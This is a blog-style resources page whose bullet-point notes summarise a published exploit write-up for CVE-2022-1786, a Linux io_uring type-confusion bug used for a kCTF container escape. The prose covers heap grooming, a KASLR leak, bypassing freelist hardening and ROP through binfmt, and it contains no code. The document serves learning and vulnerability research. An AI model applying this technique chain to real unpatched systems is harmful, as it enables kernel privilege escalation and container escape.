Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

A Journey To The Dawn - CVE-2022-1786 - 983

KyleBotPosted 3 Years Ago
  • io_uring is a new subsystem in the Linux kernel used for speedy IO operations. In particular, the program may need to do privilege transitions many times via syscalls. Instead, a series of IO operations can be performed in parallel.
  • Rapid development == more bugs though. Additionally, complex code with a ton of asynchronous operations tends to have security bugs as well. Additionally, many bugs within io_uring have been used to break out of the Container Optimized OS ran by kCTF, making this a good attack surface for them.
  • When the function io_req_init_async is called, it assigns its own identity to be the worker of the IO request. However, if two threads submit an IO request to the same io_uring at the same time, then they will be attached into the same work queue but with different IDs. The fact that the same identity is used for two different requests is what causes the very subtle security issue.
  • If one of the threads exits then the IO events are all reaped. In this process, the exiting threads identity gets assigned instead of the request submitter. Why does this later? One part of the code uses this as a heap object and the other uses this as a pointer to the middle of a structure. Aka, we have a type confusion creating an invalid free.
  • How exploitable is this? Because of the CONFIG_HARDENDED_USERCOPY (which is enabled on the Container-Optimized OS), the function used to copy data from userland (copy_from_user) cannot be used across slot boundaries. So, the typically method of putting msg_msg and corrupting this will not work. It's possible to spray this area with objects we don't own but its not trivial.
  • What's the strategy then? Allocate the victim object in an invalid slot (between two slots) then use the other parts of the slot (upper and lower) to corrupt it. The object timerfd_ctx is within the kmalloc-256 slot and has plenty of pointers, making it a prime target for exploitation within our fake slot. From the fake slot, the author decided to use the upper and lower slots with the msg_msgseg object, which has mostly user controlled data.
  • Once the heap feng shui is done, we can get the information leak from the object. First, the linked list within timerfd_ctx points back to itself (heap), leading to a nice leak from the msg_msgseg object. For breaking KASLR, arming the timer will set a function pointer which points to the .text section.
  • Hijacking code execution is easy via the function pointer within the timer; but, this leads to a ton of issues. So, they decided to free the timer and attack the allocators freelist instead. The CONFIG_SLAB_FREELIST_HARDENED flag is turned on, which is a type of pointer encoding that requires uses to know the storage address of the pointer, a random value and the new pointer itself. By filling up the entire slab, we can force the ptr to be NULL, leak it and calculate the random value to write the pointer ourselves.
  • By hijacking the freelist, we know have a completely functional arbitrary write primitive. Since they wanted a container escape (and more money) they targeted the way Linux loads executables via binfmt. The structures used for loading executables are writable! Using the primitive from above, the load_binary callback function can be abused to get PC control to ROP.
  • Game over, right? This worked on the authors machine but not the kCTF machine - the only writable part of the system was tmpfs, which was not compatible with the exploit and we needed the O_DIRECT file flag to make this possible. Only a few files could be opened with this flag in the container and they were all very small, making the exploit unreliable.
  • After playing with the heap feng shui and playing with the freelist, they decided to go with a different strategy. They used the timerfd_ctx to ROP instead. Using this, the same controlled binfmt overwrite could be used to get code execution. Another novel technique that was used was to call msleep to gracefully end the ROP in the interrupt context to cause the program to not crash.
  • Amazing article! Great background, nice references and I love the ups & downs included in the article. The thought process behind every decision is very clear, regardless if the thing worked or not. Great exploit and definitely worth the 90K from Google.